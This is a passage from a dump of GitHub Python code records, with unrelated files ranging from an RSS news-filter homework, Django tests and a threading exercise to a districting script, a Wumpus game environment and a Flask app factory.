attribute.\n\n def __init__(self,time):\n self.time = datetime.strptime(time, '%d %b %Y %H:%M:%S') \n\n def convert_time(self, story_time):\n # conv_time = story_time.replace(tzinfo=pytz.timezone(\"EST\"))\n conv_time = story_time.replace(tzinfo=None)\n return conv_time\n # if self.time == conv_time: \n # return True\n # else: \n # return False\n\n\n# Problem 6\nclass BeforeTrigger(TimeTrigger):\n def __init__(self, trigger_time):\n self.time = datetime.strptime(trigger_time, '%d %b %Y %H:%M:%S') \n def beforetrigger(self, story):\n story_time = self.convert_time(story.get_pubdate())\n print('STORY TIME: ', story_time)\n print('TRIGGER TIME: ', self.time)\n return story_time < self.time\n # return True\n # else: \n # return False\n def evaluate(self, story):\n return self.beforetrigger(story)\n\n\nclass AfterTrigger(TimeTrigger):\n def __init__(self, trigger_time):\n self.time = datetime.strptime(trigger_time, '%d %b %Y %H:%M:%S') \n def aftertrigger(self, story):\n story_time = self.convert_time(story.get_pubdate())\n return story_time > self.time \n # return True\n # else: \n # return False\n def evaluate(self, story):\n return self.aftertrigger(story)\n\n\n# COMPOSITE TRIGGERS\n\n# Problem 7\nclass NotTrigger(Trigger):\n def __init__(self, trigger):\n self.trigger = trigger\n def invert_trigger(self, story):\n return not self.trigger.evaluate(story)\n def evaluate(self, story):\n return self.invert_trigger(story)\n\n# Problem 8\nclass AndTrigger(Trigger):\n def __init__(self, trigger1, trigger2):\n self.trigger1 = trigger1\n self.trigger2 = trigger2\n def trigger_both(self, story):\n trig_1 = self.trigger1.evaluate(story)\n trig_2 = self.trigger2.evaluate(story)\n return trig_1 & trig_2\n def evaluate(self, story):\n return self.trigger_both(story)\n\n# Problem 9\nclass OrTrigger(Trigger):\n def __init__(self, trigger1, trigger2):\n self.trigger1 = trigger1\n self.trigger2 = trigger2\n def trigger_both(self, story):\n trig_1 = self.trigger1.evaluate(story)\n trig_2 = self.trigger2.evaluate(story)\n return trig_1 | trig_2\n def evaluate(self, story):\n return self.trigger_both(story)\n\n\n#======================\n# Filtering\n#======================\n\n# Problem 10\ndef filter_stories(stories, triggerlist):\n \"\"\"\n Takes in a list of NewsStory instances.\n\n Returns: a list of only the stories for which a trigger in triggerlist fires.\n \"\"\"\n # TODO: Problem 10\n fire_stories = []\n for story in stories: \n for trigger in triggerlist:\n if trigger.evaluate(story):\n fire_stories.append(story)\n return fire_stories\n\n\n\n#======================\n# User-Specified Triggers\n#======================\n# Problem 11\ndef read_trigger_config(filename):\n \"\"\"\n filename: the name of a trigger configuration file\n\n Returns: a list of trigger objects specified by the trigger configuration\n file.\n \"\"\"\n # We give you the code to read in the file and eliminate blank lines and\n # comments. You don't need to know how it works for now!\n trigger_file = open(filename, 'r')\n trig_map = {'DESCRIPTION':DescriptionTrigger,\n 'TITLE': TitleTrigger,\n 'AFTER': AfterTrigger,\n 'BEFORE': BeforeTrigger,\n 'NOT': NotTrigger,\n 'AND': AndTrigger,\n 'OR': OrTrigger}\n config_trigs = {}\n triggers = []\n lines = []\n for line in trigger_file:\n line = line.rstrip()\n if not (len(line) == 0 or line.startswith('//')):\n lines.append(line)\n # print('LINES')\n # print(lines)\n # TODO: Problem 11\n \n # line is the list of lines that you need to parse and for which you need\n # to build triggers\n for line in lines: \n eles = line.split(',')\n trig_name = eles[0]\n # print('ELES')\n # print(eles)\n if trig_name not in ['ADD','OR','NOT']:\n args = eles[2:]\n # print('TRIG_NAME')\n # print(trig_name)\n # if eles[1] in trig_map.keys():\n if len(eles) <= 3: \n # if len(args) <=1 :\n config_trigs[trig_name] = trig_map[eles[1]](args[0])\n \n print(config_trigs)\n else: \n trig1, trig2 = [config_trigs[arg] for arg in args]\n print(trig1, trig2)\n config_trigs[trig_name] = trig_map[eles[1]](trig1, trig2)\n \n # elif eles[0] in trig_map.keys():\n # # print(\"it's ADD\")\n # raise ValueError\n else: \n trig1, trig2 = [config_trigs[arg] for arg in args]\n triggers.extend((trig1, trig2))\n # print('TRIGGERS...')\n print('TRIGGERS') \n print(triggers) # for now, print it so you see what it contains!\n return triggers\n\n\nSLEEPTIME = 120 #seconds -- how often we poll\n\ndef main_thread(master):\n # A sample trigger list - you might need to change the phrases to correspond\n # to what is currently in the news\n cwd = os.getcwd()\n path = os.path.join(cwd, 'section 5/pset5hw/hw.txt')\n try:\n print('TRYING...')\n t1 = TitleTrigger(\"election\")\n t2 = DescriptionTrigger(\"Trump\")\n t3 = DescriptionTrigger(\"Clinton\")\n t4 = AndTrigger(t2, t3)\n triggerlist = [t1, t4]\n\n # Problem 11\n # TODO: After implementing read_trigger_config, uncomment this line \n triggerlist = read_trigger_config(path)\n print('TRIGGERS CALL ...')\n # HELPER CODE - you don't need to understand this!\n # Draws the popup window that displays the filtered stories\n # Retrieves and filters the stories from the RSS feeds\n frame = Frame(master)\n frame.pack(side=BOTTOM)\n scrollbar = Scrollbar(master)\n scrollbar.pack(side=RIGHT,fill=Y)\n\n t = \"Google & Yahoo Top News\"\n title = StringVar()\n title.set(t)\n ttl = Label(master, textvariable=title, font=(\"Helvetica\", 18))\n ttl.pack(side=TOP)\n cont = Text(master, font=(\"Helvetica\",14), yscrollcommand=scrollbar.set)\n cont.pack(side=BOTTOM)\n cont.tag_config(\"title\", justify='center')\n button = Button(frame, text=\"Exit\", command=root.destroy)\n button.pack(side=BOTTOM)\n guidShown = []\n def get_cont(newstory):\n if newstory.get_guid() not in guidShown:\n cont.insert(END, newstory.get_title()+\"\\n\", \"title\")\n cont.insert(END, \"\\n---------------------------------------------------------------\\n\", \"title\")\n cont.insert(END, newstory.get_description())\n cont.insert(END, \"\\n*********************************************************************\\n\", \"title\")\n guidShown.append(newstory.get_guid())\n\n while True:\n\n # print(\"Polling . . .\", end=' ')\n # Get stories from Google's Top Stories RSS news feed\n stories = process(\"http://news.google.com/news?output=rss\")\n\n # Get stories from Yahoo's Top Stories RSS news feed\n stories.extend(process(\"http://news.yahoo.com/rss/topstories\"))\n\n stories = filter_stories(stories, triggerlist)\n\n list(map(get_cont, stories))\n scrollbar.config(command=cont.yview)\n\n\n print(\"Sleeping...\")\n time.sleep(SLEEPTIME)\n\n except Exception as e:\n print(e)\n\n\nif __name__ == '__main__':\n root = Tk()\n root.title(\"Some RSS parser\")\n t = threading.Thread(target=main_thread, args=(root,))\n t.start()\n root.mainloop()\n\n","repo_name":"dyadxmachina/computation","sub_path":"section 5/pset5hw/ps5.py","file_name":"ps5.py","file_ext":"py","file_size_in_byte":13143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"11364299833","text":"from django.test import TestCase\nfrom rest_framework.test import APIClient\nfrom django.urls import reverse\nfrom rest_framework import status\n\nCREATE_OUTLIER_URL = reverse('create_outliers')\nclass TestOutlier(TestCase):\n '''Create a new Outlier'''\n\n def setUp(self):\n self.client = APIClient()\n\n def test_create_outlier_success(self):\n '''Test creating a new Outlier'''\n\n payload = {\n 'project_name': 'RaizenOutlier',\n 'table_name': 'Values',\n 'outlier': '1 0.6'\n }\n\n res = self.client.post(CREATE_OUTLIER_URL, payload)\n self.assertEqual(res.status_code, status.HTTP_201_CREATED)\n\n \n def test_create_outlier_error(self):\n '''Test creating a new Outlier with an error code'''\n\n payload = {\n 'project_name': 'RaizenOutlier',\n 'table_name': 'Values',\n 'outlier': '1 '\n }\n\n res = self.client.post(CREATE_OUTLIER_URL, payload)\n self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)\n \n \n\nclass ListOutlier(TestCase):\n '''List Outliers registered'''\n\n def setUp(self):\n self.client = APIClient()\n payload = {\n 'project_name': 'RaizenOutlier',\n 'table_name': 'Values',\n 'outlier': '1 0.6'\n }\n\n self.client.post(CREATE_OUTLIER_URL, payload)\n\n def test_list_outlier(self):\n '''Test Listining Outliers'''\n\n res = self.client.get('/api/list_outliers/RaizenOutlier/Values/')\n self.assertEqual(res.status_code, status.HTTP_200_OK)","repo_name":"AdrianoCasimiro/outlier_monitor","sub_path":"api/core/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"35052803156","text":"\nimport queue\nimport threading\nimport time\nimport random\n\nq = queue.Queue()\n\nclass Productor(threading.Thread):\n def __init__(self, q):\n threading.Thread.__init__(self)\n self.q = q\n\n def run(self):\n while True:\n a = self.q.put(1)\n b = self.q.put(2)\n time.sleep(1)\n print(\"Contenido de la cola: \"+str(list(self.q.queue)))\n\n\nclass Consumidor(threading.Thread):\n def __init__(self, q):\n threading.Thread.__init__(self)\n self.q = q\n\n def run(self):\n while True:\n a = self.q.get()\n b = self.q.get()\n sum = a + b\n print(sum)\n time.sleep(2) \n\np = Productor(q)\nc = Consumidor(q)\n\np.start()\nc.start()\n\np.join()\nc.join()\n\n\n\n","repo_name":"DiegoRP6/PSP","sub_path":"PracticaU1/PracticaTipoExamen1.py","file_name":"PracticaTipoExamen1.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"2365311021","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Sep 28 21:22:07 2015\n\n@author: ellie\n\"\"\"\nfrom matplotlib import pyplot\nfrom shapely.geometry import Polygon\nfrom shapely.geometry import MultiPolygon\nfrom shapely.geometry import LineString\nimport shapely.geos\nimport numpy as np\nfrom descartes import PolygonPatch\nfrom matplotlib.collections import PatchCollection\nimport math\nimport time\nimport gerrymander as gerry\ndef isoperi(polygon):\n area=polygon.area\n perim=polygon.length\n num=4*math.pi*area\n denom=perim**2\n quo=num/denom\n return quo\ndef distance(p1,p2):\n return math.sqrt((p1[0]-p2[0])**2 + (p1[1]-p2[1])**2)\n\n# sorts precincts by position with respect to the specified angle\ndef lineSortPrecincts(precincts,angle):\n sin = math.sin(angle)\n cos = math.cos(angle)\n def dot(pos):\n return cos*pos[0] + sin*pos[1]\n def comp(x,y):\n return cmp(dot(x.position()),dot(y.position()))\n precincts = sorted(precincts,comp)\n return precincts\ndef landgrab(precincts,districts,startTime=time.time()):\n# print('hi')\n if(districts == 1):\n dist = gerry.District(precincts)\n return [dist]\n print('splitting an area into', districts, 'districts...','at', time.time()-startTime, 'seconds')\n lowAmt = int(districts/2.0)\n ratio = lowAmt/float(districts-lowAmt)\n\n from random import sample\n\n# def findFarthest():\n# i=0\n# def findMax(p1):\n# return max((isoperi(p),p) for p in precincts)[1]\n# p1 = sample(precincts,1)[0]\n# ls=[]\n# while i0):\n return True\n return False\n def inParts(nextP):\n for part in parts:\n if nextP in part:\n return True\n return False\n \n \n# while lengthOK():\n## if (i>=50 and i%delta==0):\n## checkForEnclaves(unassigned)\n# for d1 in range(districts):\n# f1=f[d1]\n# pop1=pops[d1]\n# part1=parts[d1]\n# for d2 in range(districts):\n# if (d1==d2):\n# break\n# f2=f[d2]\n# pop2=pops[d2]\n# part2=parts[d2]\n# while((len(f1) == 0 or pop2/float(pop1+1) < 1.0/ratio) and len(f2) > 0):\n# t=heapq.heappop(f[d2])\n# print(t)\n# if (type(t) is int):\n# continue\n# nextP = t[1]\n# if(inParts(nextP)):\n# continue\n# parts[d2].add(nextP)\n# pops[d2] = pops[d2] + nextP.population()\n# new = [toTup(d[d2],p) for p in nextP.adjacent() if p in these and not inParts(p)]\n# for p in new:\n# heapq.heappush(f2,p)\n \n# print 'lengths:','p1:',len(part1),'p2:',len(part2)\n while len(f1) > 0 or len(f2) > 0:\n while((len(f1) == 0 or pop2/float(pop1+1) < 1.0/ratio) and len(f2) > 0):\n t=heapq.heappop(f2)\n# print(t)\n if (type(t) is int):\n break\n nextP = t[1]\n if(nextP in part1 or nextP in part2):\n continue\n part2.add(nextP)\n pop2 = pop2 + nextP.population()\n new = [toTup(precinct1,p) for p in nextP.adjacent() if p in these and p not in part1 and p not in part2]\n for p in new:\n heapq.heappush(f2,p)\n while((len(f2) == 0 or pop1/float(pop2+1) < ratio) and len(f1) > 0):\n t=heapq.heappop(f1)\n# print(t)\n if (type(t) is int):\n break\n nextP = t[1]\n if(nextP in part1 or nextP in part2):\n continue\n part1.add(nextP)\n pop1 = pop1 + nextP.population()\n new = [toTup(precinct2,p) for p in nextP.adjacent() if p in these and p not in part1 and p not in part2]\n for p in new:\n heapq.heappush(f1,p)\n\n \"\"\"pop1 = sum(p.population() for p in part1)\n pop2 = sum(p.population() for p in part2)\"\"\"\n \"\"\"lowAmt = (min(pop1,pop2)*districts)/(pop1+pop2)\"\"\"\n \"\"\"if(pop1 > pop2):\n part1, part2 = part2, part1\"\"\"\n dists = [gerry.District(part1),gerry.District(part2)]\n# dists=d\n# for dis in range(districts):\n# print('part', str(dis+1),'has pop:', dists[dis].population())\n drawAsher(dists, time.ctime(), '')\n print('part 1 has pop:',dists[0].population(),'part 2 has pop:',dists[1].population())\n# return dists\n# sm=[]\n# for part in parts:\n# sm = sm+landgrab(part, lowAmt, startTime, fileName, title)\n# return sm\n leftSplit = landgrab(part1,lowAmt,startTime)\n rightSplit = landgrab(part2,districts-lowAmt,startTime)\n return leftSplit + rightSplit\ndef drawLE(districts, fileName, title):\n mp=shapely.geometry.MultiPolygon([district.asPolygon() for district in districts])\n cm = pyplot.get_cmap('YlOrRd')\n num_colours=len(mp)\n## num_colours = len(mp)\n## p=shapely.geometry.Polygon([(0,0), (1, 0), (1,1)])\n## p.\n fig = pyplot.figure()\n ax = fig.add_subplot(111)\n if (len(mp)==0):\n minx=0\n miny=0\n maxx=100\n maxy=100\n else:\n minx, miny, maxx, maxy = mp.bounds\n \n w, h = maxx - minx, maxy - miny\n ax.set_xlim(minx - 0.2 * w, maxx + 0.2 * w)\n ax.set_ylim(miny - 0.2 * h, maxy + 0.2 * h)\n ax.set_aspect(1)\n \n patches = []\n for idx, p in enumerate(mp):\n \n colour = cm(1. * idx / num_colours)\n patches.append(PolygonPatch(p, fc=colour, ec='#555555', lw=0.2, alpha=1., zorder=1))\n ax.add_collection(PatchCollection(patches, match_original=True))\n ax.set_xticks([])\n ax.set_yticks([])\n pyplot.title(title)\n pyplot.tight_layout()\n# print('heelo')\n pyplot.savefig(fileName+'v1.png', alpha=True, dpi=300)\n pyplot.show()\ndef drawAsher(result, fileName, title):\n mp = MultiPolygon([district.asPolygon() for district in result])\n fig = pyplot.figure()\n ax = fig.add_subplot(111)\n num_colours = len(result)\n minx, miny, maxx, maxy = mp.bounds\n w, h = maxx - minx, maxy - miny\n ax.set_xlim(minx - 0.1 * w, maxx + 0.1 * w)\n ax.set_ylim(miny - 0.1 * h, maxy + 0.1 * h)\n ax.set_aspect(1)\n\n maxPop = max(max(precinct.population()/precinct.area for precinct in district.precincts()) for district in result)\n\n patches = []\n for i in range(len(result)):\n\t #patches.append(PolygonPatch(result[i][1], ec='black', lw=1.0, alpha=1, zorder=1))\n color = np.random.rand(3,)\n for polygon in result[i].precincts():\n patches.append(PolygonPatch(polygon, fc=color, alpha=min(pow(float(polygon.population()/polygon.area) / maxPop,1.0/3.0)*4+0.4,1.0), lw=0, zorder=1))\n ax.add_collection(PatchCollection(patches, match_original=True))\n for i in range(len(result)):\n x,y = result[i].asPolygon().exterior.xy\n ax.plot(x, y, color='black', alpha=1,linewidth=1, solid_capstyle='round', zorder=1)\n ax.set_xticks([])\n ax.set_yticks([])\n pyplot.title(title)\n pyplot.tight_layout()\n pyplot.savefig(fileName+'v2.png', alpha=True, dpi=300)\n pyplot.show()","repo_name":"lelisadav/HowToStealAnElection","sub_path":"workspace/Final/landgrab.py","file_name":"landgrab.py","file_ext":"py","file_size_in_byte":9894,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"24874416124","text":"class Solution(object):\n def search(self, reader, target):\n \"\"\"\n :type reader: ArrayReader\n :type target: int\n :rtype: int\n \"\"\"\n # findout the upper bound of the index using exponential backoff\n k = 0\n cnt = 0\n while reader.get(k) < target:\n k += 2**cnt\n cnt += 1\n\n start, end = 0, k\n\n while start + 1 < end:\n mid = start + (end-start)//2\n if reader.get(mid) == target:\n return mid\n elif reader.get(mid) < target:\n start = mid\n else:\n end = mid\n\n if reader.get(start) == target:\n return start\n if reader.get(end) == target:\n return end\n\n return -1","repo_name":"OrangePeelZ/codingTime","sub_path":"Search_in_a_Sorted_Array_of_Unknown_Size.py","file_name":"Search_in_a_Sorted_Array_of_Unknown_Size.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"70944394186","text":"import random\nimport sys\n\nimport numpy as np\nfrom gpl.utils import Bunch\nimport copy\n\nfrom ..grammar.objects import WUMPUS, GOLD, AGENT, EMPTY, PIT, PLAYER1, PLAYER2\nfrom ..utils import identify_next_player\n\n\nSIMPLIFIED_OBJECT = {\n EMPTY:' . ',\n WUMPUS:' W ',\n AGENT:' A ',\n GOLD:' g ',\n PIT:' * ',\n}\n\nTURN_TO_PIECES = {\n PLAYER1: [AGENT,],\n PLAYER2: [WUMPUS,],\n}\n\nopposite_player = lambda c: PLAYER2 if c == PLAYER1 else PLAYER1\n\n\nPIECE_VALID_ACTIONS = {\n AGENT: lambda pos, rep, params: agent_valid_actions(pos, rep, params),\n WUMPUS: lambda pos, rep, params: wumpus_valid_actions(pos, rep, params),\n}\n\n# Actions IDs\n\nUP = 0\nDOWN = 1\nRIGHT = 2\nLEFT = 3\nLEFTUP = 4\nRIGHTUP = 5\nRIGHTDOWN = 6\nLEFTDOWN = 7\n\nACTION_MOVE_DIRECTION = {\n UP: (-1, 0),\n DOWN: (1, 0),\n RIGHT: (0, 1),\n LEFT: (0, -1),\n LEFTUP: (-1, -1),\n RIGHTUP: (-1, 1),\n RIGHTDOWN: (1, 1),\n LEFTDOWN: (1, -1),\n}\n\nMOVE_ACTION = {\n ACTION_MOVE_DIRECTION[UP]: UP,\n ACTION_MOVE_DIRECTION[DOWN]: DOWN,\n ACTION_MOVE_DIRECTION[RIGHT]: RIGHT,\n ACTION_MOVE_DIRECTION[LEFT]: LEFT,\n ACTION_MOVE_DIRECTION[LEFTUP]: LEFTUP,\n ACTION_MOVE_DIRECTION[RIGHTUP]: RIGHTUP,\n ACTION_MOVE_DIRECTION[RIGHTDOWN]: RIGHTDOWN,\n ACTION_MOVE_DIRECTION[LEFTDOWN]: LEFTDOWN,\n}\n\n# unary predicates\nAT_WUMPUS = 'at_wumpus'\nAT_PIT = 'at_pit'\n\n\n# Begin Wumpus =================================\n\nclass Env(object):\n def __init__(self, params):\n self.params = params\n\n def act(self, rep, action):\n layout = rep.grid\n assert rep.nact < self.params.max_actions[rep.player] + 1\n assert not terminated(rep)\n valid_actions = self.available_actions(rep)\n assert action in valid_actions\n l = layout.copy()\n if rep.player == PLAYER1:\n l, at_wumpus_, at_pit_ = layout_after_agent_action(rep, action, self.params)\n else:\n l, at_wumpus_, at_pit_ = layout_after_wumpus_action(rep, action, self.params)\n new_rep = copy.deepcopy(rep)\n new_rep.grid = l\n if rep.nact < self.params.max_actions[rep.player]:\n new_rep.nact += 1\n else:\n new_rep.nact = 1\n new_rep.player = opposite_player(rep.player)\n if self.params.use_next_player_as_feature:\n new_rep.next_player = identify_next_player(new_rep, self.params)\n setattr(new_rep, AT_WUMPUS, at_wumpus_)\n setattr(new_rep, AT_PIT, at_pit_)\n return self.__update_rep(new_rep)\n\n def __update_rep(self, rep):\n updated_rep = rep.to_dict()\n gstatus = self.check_game_status(rep)\n if gstatus == 1:\n updated_rep['goal'] = True\n elif gstatus == -1:\n updated_rep['deadend'] = True\n updated_rep['nmoves'] += 1\n return Bunch(updated_rep)\n\n @staticmethod\n def get_simplified_objects():\n return SIMPLIFIED_OBJECT\n\n def check_game_status(self, rep):\n if len(gold_positions(rep.grid)) == 0:\n return 1\n elif not agent_alive(rep):\n return -1\n else:\n return 0\n\n def available_actions(self, rep):\n layout = rep.grid\n actions = []\n if rep.player == PLAYER1:\n try:\n c0 = np.argwhere(layout == AGENT)[0]\n except:\n print('H')\n actions += PIECE_VALID_ACTIONS[AGENT](c0, rep, self.params)\n elif rep.player == PLAYER2:\n c0 = np.argwhere(layout == WUMPUS)[0]\n actions += PIECE_VALID_ACTIONS[WUMPUS](c0, rep, self.params)\n return actions\n\n def player2_policy(self, rep):\n ava_actions = self.available_actions(rep)\n return np.random.choice(ava_actions)\n\n def get_action_space(self):\n if not self.params.can_build_walls:\n return self.params.ava_actions[PLAYER1]\n else:\n return None\n\n @staticmethod\n def encode_op(rep, op):\n if not isinstance(op, tuple):\n return op\n else:\n return \"{}_{}.{}\".format(WALL, op[0], op[1])\n\n def init_instance(self, key):\n rep = {u: False for u in self.params.unary_predicates}\n rep['grid'] = generate_gird(key)\n rep['nact'] = 1\n rep['player'] = PLAYER1\n rep['goal'] = False\n rep['nmoves'] = 0\n rep['deadend'] = False\n assert AGENT in rep['grid'] and GOLD in rep['grid']\n rep[AT_WUMPUS] = False\n rep[AT_PIT] = None\n rep['next_player'] = identify_next_player(Bunch(rep), self.params)\n return Bunch(rep)\n\n# Helper mehtods =================================\n\ndef terminated(rep):\n if not agent_alive(rep) or len(gold_positions(rep.grid)) == 0:\n return 1\n else:\n return 0\n\n\ndef agent_alive(rep):\n if at_pit(rep) is not None:\n return False\n elif at_wumpus(rep):\n return False\n else:\n return True\n\n\ndef at_wumpus(rep):\n return getattr(rep, AT_WUMPUS)\n\n\ndef at_pit(rep):\n return getattr(rep, AT_PIT)\n\n\ndef agent_valid_actions(pos, rep, params):\n layout = rep.grid\n valid_action = []\n action_space = params.ava_actions[PLAYER1]\n for action_id, direction in ACTION_MOVE_DIRECTION.items():\n if not action_id in action_space:\n continue\n running_pos = np.add(pos, direction)\n if np.any(running_pos < 0):\n continue\n try:\n next_cell = layout[running_pos[0], running_pos[1]]\n except IndexError:\n continue\n if next_cell in {PIT, WUMPUS}:\n continue\n else:\n valid_action.append(action_id)\n return valid_action\n\n\ndef layout_after_agent_action(rep, action, params):\n layout = rep.grid\n assert AGENT in layout\n assert action in params.ava_actions[PLAYER1]\n at_wumpus_ = at_wumpus(rep)\n at_pit_ = at_pit(rep)\n l = layout.copy()\n agent_pos = np.argwhere(layout == AGENT)[0]\n running_pos = np.add(agent_pos, ACTION_MOVE_DIRECTION[action])\n assert not np.any(running_pos < 0)\n try:\n next_cell = l[running_pos[0], running_pos[1]]\n except:\n raise IndexError\n l[agent_pos[0], agent_pos[1]] = EMPTY\n if next_cell not in {PIT, WUMPUS}:\n l[running_pos[0], running_pos[1]] = AGENT\n elif next_cell in WUMPUS:\n at_wumpus_ = True\n elif next_cell in PIT:\n at_pit_ = (running_pos[0], running_pos[1])\n return l, at_wumpus_, at_pit_\n\n\ndef wumpus_valid_actions(pos, rep, params):\n layout = rep.grid\n valid_action = []\n action_space = params.ava_actions[PLAYER2]\n for action_id, direction in ACTION_MOVE_DIRECTION.items():\n if not action_id in action_space:\n continue\n running_pos = np.add(pos, direction)\n if np.any(running_pos < 0):\n continue\n try:\n next_cell = layout[running_pos[0], running_pos[1]]\n except IndexError:\n continue\n if next_cell in {GOLD, PIT}:\n continue\n else:\n valid_action.append(action_id)\n return valid_action\n\n\ndef layout_after_wumpus_action(rep, action, params):\n layout = rep.grid\n assert WUMPUS in layout\n assert action in params.ava_actions[PLAYER2]\n at_wumpus_ = at_wumpus(rep)\n at_pit_ = at_pit(rep)\n l = layout.copy()\n pos = np.argwhere(layout == WUMPUS)[0]\n running_pos = np.add(pos, ACTION_MOVE_DIRECTION[action])\n assert not np.any(running_pos < 0)\n try:\n next_cell = l[running_pos[0], running_pos[1]]\n except:\n raise IndexError\n assert next_cell not in {GOLD, PIT}\n l[pos[0], pos[1]] = EMPTY\n if next_cell in AGENT:\n at_wumpus_ = True\n l[running_pos[0], running_pos[1]] = WUMPUS\n return l, at_wumpus_, at_pit_\n\n\ndef gold_positions(layout):\n return np.argwhere(layout==GOLD)\n\n\n### Instances\n\ndef generate_gird(key):\n height, width, cell_agent, cell_wumpus, pits, golds =\\\n LAYOUTS[key]\n grid = np.full((height, width), EMPTY, dtype=object)\n grid[cell_agent] = AGENT\n grid[cell_wumpus] = WUMPUS\n for p_pos in pits:\n grid[p_pos] = PIT\n for g_pos in golds:\n grid[g_pos] = GOLD\n return grid\n\n\nLAYOUTS = {\n 0: (4, 4, (0, 0), (3, 3), {(1, 3), (1, 0), (2, 2), (3, 0), (0, 3)}, {(2, 3)}),\n 1: (3, 3, (0, 0), (2, 0), {(1, 2), (1, 0), (2, 2)}, {(1, 2)}),\n 2: (6, 6, (4, 5), (4, 0), {(3, 0), (4, 4), (2, 2)}, {(1, 2), (0, 0)}),\n 3: (8, 8, (1, 1), (5, 5), {}, {(3, 4), (2, 2), (5, 0)}),\n 4: (5, 5, (1, 1), (4, 4), {(0, 1)}, {(4, 0)}),\n 5: (4, 4, (0, 0), (3, 3), {}, {(3, 0)}),\n 6: (3, 3, (2, 0), (0, 0), {}, {(1, 2)}),\n 7: (5, 5, (0, 0), (4, 1), {(2 ,0), (2 ,1), (2 ,2), (0, 4)}, {(2, 4)}),\n 8: (4, 4, (2, 3), (3, 0), {(2, 1)}, {(0, 1)}),\n 9: (4, 3, (0, 2), (3, 0), {(2, 1), (1, 1)}, {(3, 2), (0, 1)}),\n 9: (4, 3, (0, 2), (3, 0), {(2, 1), (1, 1)}, {(3, 2), (0, 1)}),\n}\n\n\n\n","repo_name":"iOrb/gpl","sub_path":"src/gpl/domains/grid_games/envs/wumpus.py","file_name":"wumpus.py","file_ext":"py","file_size_in_byte":8856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"32197368070","text":"import flask\nimport os\nimport yaml\nfrom flask_security import Security\nfrom flask_mail import Mail\nimport logbook\nimport logging\nfrom logbook.compat import redirect_logging\nfrom werkzeug.middleware.proxy_fix import ProxyFix\nfrom raven.contrib.flask import Sentry\nfrom werkzeug.exceptions import HTTPException\n\nfrom .utils.profiling import profile_request_start, profile_request_end\n\ndef create_app(config=None, setup_logging=True):\n if config is None:\n config = {}\n\n ROOT_DIR = os.path.abspath(os.path.dirname(__file__))\n\n app = flask.Flask(__name__, static_folder=None)\n app.wsgi_app = ProxyFix(app.wsgi_app)\n\n _CONF_D_PATH = os.environ.get('CONFIG_DIRECTORY', os.path.join(ROOT_DIR, \"..\", \"..\", \"conf.d\"))\n\n configs = [os.path.join(ROOT_DIR, \"app.yml\")]\n\n if os.path.isdir(_CONF_D_PATH):\n configs.extend(sorted(os.path.join(_CONF_D_PATH, x) for x in os.listdir(_CONF_D_PATH) if x.endswith(\".yml\")))\n\n configs.append(os.path.expanduser('~/.config/backslash/devconfig.yml'))\n\n for yaml_path in configs:\n if os.path.isfile(yaml_path):\n with open(yaml_path) as yaml_file:\n app.config.update(yaml.full_load(yaml_file))\n\n app.config.update(config)\n\n app.before_request(profile_request_start)\n app.after_request(profile_request_end)\n\n db_uri = os.environ.get('BACKSLASH_DATABASE_URI', None)\n if db_uri is not None or 'SQLALCHEMY_DATABASE_URI' not in app.config:\n app.config['SQLALCHEMY_DATABASE_URI'] = db_uri or 'postgresql://localhost/{0}'.format(app.config['app_name'])\n\n if setup_logging:\n del app.logger.handlers[:]\n redirect_logging()\n\n if os.environ.get('BACKSLASH_TESTING', '').lower() in {'1', 'yes', 'true'}:\n app.config['TESTING'] = True\n\n if app.config['TESTING']:\n app.config['TRACEBACK_DIR'] = '/tmp/backslash_tracebacks'\n else:\n _disable_logs(['dogpile.lock'])\n\n logging.getLogger('urllib3').setLevel(logging.WARNING)\n\n if not app.config['DEBUG'] and not app.config['TESTING']:\n app.config['RAVEN_IGNORE_EXCEPTIONS'] = (HTTPException, SystemExit,)\n sentry = Sentry(app) # pylint: disable=unused-variable\n\n override_tb_location = os.environ.get('BACKSLASH_TRACEBACKS_PATH', None)\n if override_tb_location:\n app.config['TRACEBACK_DIR'] = override_tb_location\n\n app.logger.info(\"Started\")\n\n Mail(app)\n\n from . import models\n from .blueprints import rest, views, runtoken\n from .blueprints.api.main import blueprint as api_blueprint\n\n models.db.init_app(app)\n\n from . import auth\n Security(app, auth.user_datastore, register_blueprint=False)\n\n blueprints = [auth.auth, views.blueprint, api_blueprint, rest.blueprint, runtoken.blueprint]\n\n from .errors import errors\n\n for blueprint in blueprints:\n app.register_blueprint(blueprint)\n\n for code in errors:\n app.errorhandler(code)(errors[code])\n\n return app\n\n\ndef _disable_logs(logger_names):\n\n logger_names = set(logger_names)\n\n def filter(record, _):\n return record.channel in logger_names\n\n logbook.NullHandler(filter=filter).push_application()\n","repo_name":"getslash/backslash","sub_path":"flask_app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3149,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"81"} +{"seq_id":"37743453961","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import cross_val_score\nfrom xgboost import XGBRegressor\n\ndef score_dataset(X, y, model=XGBRegressor()):\n # Label encoding for categoricals\n for colname in X.select_dtypes([\"category\", \"object\"]):\n X[colname], _ = X[colname].factorize()\n # Metric for Housing competition is RMSLE (Root Mean Squared Log Error)\n score = cross_val_score(\n model, X, y, cv=5, scoring=\"neg_mean_squared_log_error\",\n )\n score = -1 * score.mean()\n score = np.sqrt(score)\n return score\n\n# Prepare data\ndf = pd.read_csv(\"../input/fe-course-data/ames.csv\")\nX = df.copy()\ny = X.pop(\"SalePrice\")\n\n# Create math tranforms\nX_1 = pd.DataFrame() # dataframe to hold new features\nX_1[\"LivLotRatio\"] = df.GrLivArea / df.LotArea\nX_1[\"Spaciousness\"] = (df.FirstFlrSF + df.SecondFlrSF) / 